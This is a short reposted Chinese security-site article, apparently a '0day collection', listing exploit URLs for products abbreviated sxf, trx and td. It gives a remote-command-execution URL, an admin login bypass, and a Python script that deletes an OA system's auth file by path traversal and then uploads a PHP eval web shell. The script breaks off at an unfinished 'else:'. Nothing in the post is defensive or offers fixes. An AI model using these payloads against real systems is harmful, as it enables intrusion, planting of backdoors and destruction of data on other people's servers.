sxf, trx, td (0day collection)

admin, 2023-02-23 21:20:15

Disclosed on the internet:



sxf-edr

    RCE:

            /tool/log/c.php?strip_slashes=system&host=id

    Arbitrary user login:

            /ui/login.php?user=admin


trx - unauthorized access + privilege escalation


td-rce

    target="http://127.0.0.1:1234/"
    payload="<?php eval($_POST['1234']);?>"
    print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
    input("Press enter to continue")
    print("[*]Deleting auth.inc.php....")

    url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
    requests.get(url=url)
    print("[*]Checking if file deleted...")
    url=target+"/inc/auth.inc.php"
    page=requests.get(url=url).text
    if 'No input file specified.' not in page:
        print("[-]Failed to deleted auth.inc.php")
        exit(-1)
    print("[+]Successfully deleted auth.inc.php!")
    print("[*]Uploading payload...")
    url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
    files = {'FILE1': ('deconf.php', payload)}
    requests.post(url=url,files=files)
    url=target+"/_deconf.php"
    page=requests.get(url=url).text
    if 'No input file specified.' not in page:
        print("[+]Filed Uploaded Successfully")
        print("[+]URL:",url)
    else:

This article was first published on the WeChat official account Khan安全攻防实验室: sxf, trx, td (0day collection)

  • Published on 2023-02-23 21:20:15
  • Please keep this article's link when reposting (CN-SEC中文网: thanks to the original author for the hard work):
                   sxf, trx, td (0day collection) http://cn-sec.com/archives/535361.html
